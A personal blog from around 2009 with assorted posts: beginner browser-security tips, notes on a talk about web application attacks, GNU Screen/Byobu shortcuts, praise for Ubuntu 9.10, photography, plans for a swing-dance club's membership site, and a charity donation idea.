Five Steps To Protect Against Browser Attacks

Some days, it pains me to see how woefully insecure some web browsers are. Every day, it seems that ten new browser-based exploits (or client-side attacks, as my presentation will tell you) are publicly released, and just because you’re on a site that you think is legitimate doesn’t mean that somebody hasn’t compromised it.

For those of you using Internet Explorer (IE), I pity you. IE, still being the #1 most commonly-used browser in the world, is the target of the most attacks by far out of all the major browsers. If you’re smart enough to use another, better browser, then you’re already one step towards protecting yourself. I’m going to assume, though, that you’re using Firefox or one of it’s derivatives such as Flock, since the plug-in libraries are huge.

1. Use the Web of Trust
My Web of Trust (MyWOT) is a plugin for Firefox that warns you about potentially risky sites. It can alert you to known scam sites, spam sites, and pages that are known for hosting malware. It’s great for getting an idea of how trustworthy the site you are visiting is, and is a great extra level of protection against attacks against your computer.

2. Block Javascript and Popups

AdBlock Plus:
The most common form of browser-based attack is cross-site scripting, or XSS. XSS uses Javascript (a scripting language that websites use) in order to force your browser to do something. Typically, Javascript usage is legitimate; when you post something on somebody’s wall on Facebook, Javascript is used there to push the new message to their wall without refreshing the page, and to create that cool sliding effect as the old posts move down the page. You can also use it for malicious use, though. Stealing login credentials is a common one, but I’ve seen Javascript sophisticated enough to hijack your browser, forcing you to visit sites without you having any input or even downloading and running malware and viruses against your will. NoScript will block all Javascript, and then you can tell it what you want to enable. It takes a while to configure properly, but after a week or so of setting it up, you’ll be a lot more secure. XSS sometimes propagates through ads, so AdBlock is nice to have as well.

3. Use Different Passwords

This always seemed like a no-brainer to me, but I know many other people who won’t do this. Using the same password for multiple sites is just stupid. If somebody manages to steal your password from one site, what’s stopping them from going to the other site (and no, having a different user name isn’t going to prevent anything). Instead of using the same password, use different ones, minimum 8 characters, and random characters. If you can’t remember all of those, take two 4-character random strings, and take the domain name, and put each random string on either side of the domain; there’s your password. For example: “4n$sFACEBOOKn4%l”. Swap “e” for “3”, “s” for “$” or “l” for “1” – think L33T!

4. Clear Those Tracking Cookies
Although you may not realize it, tracking cookies are used to track your movement around the internet. Although you may visit very different web pages, the company that displays ads on the sites may be the same. Beat these cookies with BetterPrivacy, which removes tracking cookies and LSOs from your browser cache.

5. If You Didn’t Expect To Get It, Don’t Click It

I hate to have to reiterate common sense, but sometimes it escapes us. If you didn’t expect to get a link from somebody, or they sent you a file that you weren’t planning on getting, don’t open it. I don’t care if it came from their MSN account; if you didn’t follow rule #3, there’s no reason why their account couldn’t have been hacked. If someone sends you a link, do yourself a favour and just ASK the person what it is before you click it; if you get a reply that is something that your friend would say, then you’re probably okay.

Well, that took longer than expected. Hopefully that’s of some use for people. As always, I appreciate your comments and feedback. If you like what you read, help me out by posting the article on Reddit, Facebook, or Digg (or sending the link to a friend). See you next Monday!

I’m Back

Well, it’s been a while since I’ve posted; about three weeks, actually. To the one or two readers I have, my apologies that you don’t have something to waste your time on twice per week. I’m getting back into the writing mood, so I should be building up a buffer of things to write in the near future.

A lot has happened since I last talked about the IPAM presentation that I took part in. To start with the related topic, I was approached to do the presentation again, this time internally to other departments. Thus, the other co-op student and I set about cleaning up the presentation a bit, fixing some errors, and making it flow smoother. It went much better the second time, thankfully, both from a public speaking perspective and a demonstration perspective. As fun as it was to work on that, I’m glad it’s over and done with right now.

Speaking of work, the number of days that I have left at IPC are dwindling quickly as the new year approaches. I work until December 31st, at which point I’m back in class. It’s been a fun past couple of months, and the paychecks have been very nice, but I’m also looking forward to getting back on campus to get some more studying done. I’ve decided that I won’t get a job during the winter semester so I can concentrate on my studying; I’ll have more than enough money to get through four months, and then I’ll be working in the summer again.

After that presentation was done with at work, I found that I had a fair amount of spare time, as there weren’t too many tasks to work on. I spent that time learning Ruby on Rails, and putting that knowledge towards the new UMSwing site. Although on the outside it will look almost the same as before, this new site will have an extensive backend that will make UMSwing virtually paperless. Although you may not think we use that much paper, think again; I have a full 3″ 3-ring binder in our office that says otherwise. All of our memberships, attendance, and transactions will be tracked on the web application, thus eliminating the need for those pieces of paper to be printed in the first place. Anyways, I’ve been working very hard on the site, and it’s almost ready to be tested by some other people. So, if you’re interested in testing some software for an eco-friendly cause, let me know in the comments section and I’ll keep you informed.

That’s a quick update on what’s happened in the past few weeks at work. I have a few more updates to spew out in the coming days, one of them involving my server upgrade (*cough* RAID *cough*), and some involving some extra-curricular activities (including some new photos to go up soon).

IPAM Presentation: November 2009

Last Wednesday, myself and the other co-op student working with me did a presentation to the Information Protection Association of Manitoba (IPAM) about attacks on web-based applications. It was certainly an interesting experience. Although it wasn’t a stellar performance, I think we did okay considering our presentation skills. Unfortunately we were expecting a slightly larger percentage of technical-minded people rather than business-minded people, and thus I got the impression that some of the talk was a little over the heads of a few of those in attendance. Regardless, it was a learning experience, and something I learned a lot from.

I was approached twice after our presentation was over. The first gentleman, to paraphrase, suggested that the presentation would be more useful had it included a mitigation strategy to prevent and (hopefully) eliminate the possibility of attack. I thought he might be on to something here. After all, wouldn’t it be great to have a check list to go through, and making sure each item is checked off would result in a secure application? For the rest of the day, I spent a lot of time going back and forth on this idea. On one hand, this check list would be nice, but I also firmly believe that a large amount of the prevention relies on the skill level of the programmer, debugger, and penetration tester, and a check list simply wouldn’t be sufficient to protect yourself from attacks. But, having the check list would be a good start. Sort of an “if you’ve done these things, you’ve covered the basics” check list. It would be a good reminder sheet for pro programmers, and a good stepping stone for those who are just starting off. To that person, your suggestion has been heard, and the check list has been added to my to-do list, hopefully to have a first draft out within a month or so, so stay tuned for that.

The second gentleman asked if the slides to the presentation would be online for later viewing. At the end of the presentation, although we took almost an hour, I was well aware that we were rushing; we probably had too much content that we wanted to cover. Before the presentation I had already planned to put the slides online as a reference; although it’s nice to see the slides during the talk, it’s also nice to go back and view them at a later date. Thus, my slides will be online here for anybody to take a look at. I will also be posting my source code, but that will be a bit later (ie. probably next week), since there’s a few sections that are a little finicky right now.

A Busy Past Two Weeks

So my twice-per-week updates seem to have fallen a bit behind as of late. To those one or two dedicated readers, my apologies for not giving you something to burn a couple minutes from your day with.

I have three culprits to lay the blame for this lack of updates. One of those has been a savage case of writer’s block. Another of those has been a very busy schedule for me. Busier than normal, even. As such, the third and final culprit goes by the name of “Sleep Deprivation”, which always seems to tag along with culprit number two. In a possibly vain attempt to get myself back on my writing pedestal, I figured I’d fill you all in about the past two weeks.

As those of you who are involved in the Winnipeg swing scene may know, UMSwing had two events to demo at last weekend, the first being the Gilbert & Sullivan Gala Fund-raiser, and the second being the Winnipeg Jazz Orchestra’s performance. The fund-raiser involved a couple of demonstration songs, and the WJO performance involved dancing for 20 minutes during their intermission, as well as the opportunity for one or two couples to dance on stage during one of their songs. Although they took place over the weekend, I’ve been in talks with organizers of both events for quite some time, and the last week became crunch time for me as I made sure everything went as expected. I’m really glad that we were invited to both events, and we’d certainly be interested in doing it again.

To swing (no pun intended) from one quirky interest to another, this Wednesday a couple of us took advantage of the day off and planned for a session of Dungeons & Dragons. I need to take a minute here to explain this:

  • No, it did NOT die out ten years ago
  • Yes, it IS fun
  • No, you do NOT need to be an รผber-nerd to play
  • Yes, girls DO play it.

Anyway, in this group (which has yet to receive a name), I am the DM; I’m the one who tells the story, plays the non-player characters (NPCs), and guides the other players through their adventures. Although very fun to DM, it also requires a lot of work to create your own adventures; dungeons, the global map, encounters, and NPCs all need to be planned. Thus, that chewed through a fair amount of spare time that I had. On the plus side, I over-prepared, so I have everything I need for the next time around.

This weekend, I have plans to go out to a friend’s cottage for some much-needed rest. It’ll be nice to get away from it all, and hopefully take some great photos, which I hope to put up for Monday’s post. I also have some ideas for another Linux command line tip, so those of you reading my previous post regarding Byobu: stay tuned.

“I’ve never seen you here before. I like that in a woman.”
— Renaldo ‘The Heel’, Crimewave (1985)

GNU Screen and Byobu Made Easy

For the *nix elitist, no graphical tool comes close to the power that the command line provides. While this may strike some people as odd, particularly those who only have experience with Windows, it’s a pretty well known fact that the Linux command line provides a method of controlling every aspect of your computer activity; this is so much the case that most GUI applications on Linux are just command line “wrappers”, hiding you from what’s actually happening behind the scenes.

GNU ScreenWhile this is all fine and dandy, things like development and multi-tasking can prove to be a little frustrating when connecting to a remote location and requiring more than one window open. Although a typical command line pretty much prevents this from happening, using GNU Screen or Byobu can make things a lot smoother. One window, multiple command lines.

As most developers will tell you, having multiple windows available to you is a godsend. It’s particularly useful when you have scripts to run in the background that generate output, but you don’t want to fork them as a daemon. Now, with GNU Screen and Byobu, you can do this easily, and even make your screen look snazzy as well. The only drawback to these utilities is that they are a little hard to get used to. In this post, I will quickly outline some of the key combinations which I use regularly.

GNU Screen and Byobu Simplified

The number one thing to remember about every command you use is Ctrl+A, which will be written as C-a. This is picked up by screen and will tell the utility that the next characters typed will be commands for screen to interpret. Keeping in mind that all keys are case-sensitive (as most things are in Linux), take a look at some of the commands below:

C-a c - Create a new screen window

C-a A - Rename the screen

C-a C-a - Go back to the previous window

C-a <0-9> - Switch to screen #0-9 (quick toggle)

C-a " - View a list of the current screens, which will allow you to select one from the list

C-a ' - Enter a screen number to switch to (slower version of C-a <0-9>)

C-a d - Detach the whole screen session and fork to the background. Very useful for remote sessions you want to leave open. The command "screen -r" will resume your screen session.

C-a <Escape> - Scroll up through your command line "history" and see what output you previously got. Hitting <Escape> again cancels it.

With the introduction of Byobu in Ubuntu 9.10, you can also get some statistics added to the bottom of your command line window to help keep you informed about the state of the system you are running on. Hitting F9 in session will bring up the menu for customization, which can make your screen session look pretty awesome. Instead of using screen to start your screen session, simply use byobu instead. Easy as pie.

If you have any questions about GNU Screen or Byobu, let me know and I’ll see what I can do to answer them. Stay tuned on Friday for another issue of “Five Things” (hopefully).

Oct. 24 Photography Update

Now that I’ve been taking more photos recently, I’m getting into the habit of posting them up a little more frequently. Rest assured, I’ll keep you all updated when I put up new photos. If you want to take a look at some of my other photos, just head to the gallery.

As always, I welcome your feedback; just post a comment below!

[nggallery id=7]

Ubuntu’s Koala Has Good Karma

It’s not like me to gush over operating systems. Particularly looking at what we’ve dealt with in the past. If we’re lucky, we got stability in an OS, but usually at the expense of it looking terrible. This year seems to have caused things to change, however. With the release of the Windows 7 RC, Microsoft has restored a good amount of the faith that it lost after churning out the load of crap that it called Vista.

The open source community is never far behind, and Canonical’s Ubuntu 9.10 operating system is a work of art. Seriously. I would frame it and mount it on my wall if I could. Unfortunately I can’t, so all I can do is gush about it and tell people about all of it’s amazing features. Non-techies: just smile-and-nod your way through this post :).

Ubuntu One

Cloud computing is all the rage these days, and Ubuntu has jumped on the bandwagon by presenting One, a personal cloud for the synchronization of files across multiple Ubuntu computers. Set up your account, get your 2 gigs of free space, move files into the Ubuntu One folder, and let them sync. Easy as pie.

ext4 Filesystem

Following in Fedora’s footsteps, Ubuntu has set ext4 as 9.10’s default filesystem. Although you won’t make the switch if you upgrade, fresh installs will feel the warm glow of ext4 during their install.

Uncomplicated Firewall

One of my main complaints with Ubuntu’s previous setups is that it fails to include a firewall by default, and that has been remedied in 9.10, with the introduction of ufw, the uncomplicated firewall. No more sifting through the iptables’s man pages to figure out how to add a simple allow rule; ufw makes firewall management easy.

Faster Load Times with Upstart

Another popular trend recently has been the goal of reducing boot times as much as possible. Fedora Project made waves as they aimed for a 20 second boot time from BIOS to login page. Although they were a little short of their goal, they made some important headway, showing that not every single scrap needs to be loaded and cached on boot. Ubuntu has carried this forward and has made a similar goal. Although they don’t mention any specific time-related goals, they made the switch to Upstart, which makes the loading page look smooth and cuts the boot time significantly.

Overall, I’m really happy with the progress Ubuntu has made. Although a lot of previous versions have fallen a bit behind on the times in exchange for having a stable system, they are catching up with the times and even pushing the envelope with new ideas. If you were looking for a reason to switch to Linux, put this one at the top of your list. If you’re not convinced, download the LiveCD and try it out without installing (although your performance will suffer since it’s loading from a CD…duh…).

Thanks for giving this a read, everyone. If you like what you see, or have any suggestions for further writings, drop me a line in the comments section below and give me a vote on Reddit or Digg. I read each and every one of your comments: I promise ๐Ÿ™‚

The New Camera Lens: Some Sample Photos

I recently picked up a new lens for my Canon Rebel XTi DSLR camera: the EF 50mm f/1.8 II, to be precise. It’s the first lens I’ve bought for my camera so far, mainly because almost every other lens is god-awful expensive. At only $130, this was a steal of a deal, and if you have a Canon DSLR camera body, I highly recommend picking yourself up one of these.

By popular demand of a few of my friends, I’m putting up a small sampling of the photos I’ve taken with it over the past few days. Although I’m still getting used to the lens, I’m really happy with the results so far. You can check out the full album of new photos right here.

[singlepic id=48 w=320 h=240 float=]

From Paperwork to Web 2.0: UMSwing’s New Membership System

Nowadays, my life has a good amount of its time consumed with either work or swing dancing. I work every weekday, and four nights every week I’m dancing. Being the nerd that I am, I always look for opportunities to intertwine my hobbies, despite them being complete opposites. Being on the executive committee helps a lot with that, since I take the position of Web Administrator and Graphics Designer with UMSwing.

On the way home from an event a couple weeks ago, I was talking with a friend about the hassle of all the paperwork we have to go through every time we have a lesson; we need to fill out transaction logs for each payment, keep track of every person’s attendance for each class, and also mark it on their membership form that they attended and paid for that class. A single person dropping in to that class requires writing on three sheets of paper. When you’re trying to run everybody through quickly, that starts becoming an issue.

This friend, being the kind of person that seems to regurgitate good ideas on demand, suggested to me, “Brian, you’re a developer. Just write a program to do it for you. You’re learning Ruby and Rails, so you can do a web-based backend and a GUI frontend. Problem solved!”. Thus, I sat down and started planning. Rails seems to be yet another one of those languages that lacks any decent documentation or tutorials. If you plan on learning it, pick up “Agile Web Development With Rails“. It is by far the best development book I have ever read. If it’s any sort of selling point, one of the authors created the Rails framework; if he doesn’t know how to use the framework, nobody does.

As a method for potentially helping me brainstorm, I’ve decided to spill out some of my ideas and goals here. I’m only going to discuss a few ideas here; while I would normally immediately distribute this idea into the public domain, I’ve decided to keep this one closed source. If you have any suggestions or ideas, let me know and I will give you credit. Better yet, if you’re interested in this software, get in touch and we can discuss it.

Goals for Dance Site

  • Members: Keep track of all members, regardless of how long ago they joined. Eliminate the need to fill out a new membership form every semester. Each member should be assigned a member number, which can be put on a barcode. Keep track of personal information, interests, and attendance. Gather statistics/metrics from attendance vs. month/day/semester, etc.
  • Memberships: Handle multiple membership types, including drop-in. Integrate with finances to determine when a user has paid for their membership through drop-ins. Support for online payments through Paypal (ie. Mastercard, Visa, eCheck, etc.)
  • Finances: handle per-lesson incomes. Support for multiple lessons per day. Keep track of what is taught during that lesson. Provide unlockable content for each lesson; attendance to that lesson unlocks the content for that member; refresher videos, class notes, etc. Support for discounted membership dates/times.
  • Graduated system: attendance of X number of events allows you to attend higher level classes. Ability to override by administrator.
  • Mailing List: Separate old members by current members, allowing for class updates to be sent to current members, while global events to be sent to all. Ability to unsubscribe.

Have Air Miles, Will Donate To Charity

I’m sure many of you collect some sort of rewards on a reward program, be it Aeroplan or Air Miles, or some other similar program. Myself, I’m an Air Miles person, and a lot of that has to do with the really good deal that I get for Safeway prescriptions.

But I digest ๐Ÿ˜‰

While casually browsing the rewards catalog online, I was going through the gift cards and subscriptions. I happened to notice a new section for charities. Under there, you have redeem 170 Air Miles to donate $20 to one of three charities: Kids Help Phone, Special Olympics Canada, and the World Wildlife Fund. Unfortunately, Air Miles has yet to add any more charities, but I sincerely hope that they add more than those three. I’ve made a firm decision to redeem a donation for every item I redeem on there.

I’ve never seen this on a rewards site, and I think it’s a great thing to do. Think about how many reward miles you have. When was the last time you redeemed them? Do you think you could spare a few to help a good cause? I hope the answer is yes. Some people don’t donate to charities because they can’t afford it. Now that you can use Air Miles, this should make things a little easier. Alternatively, redeem a gift certificate somewhere you would normally shop, and use the saved money to a charity of your choice. Either way, it’s a free donation.

Just a little food for thought.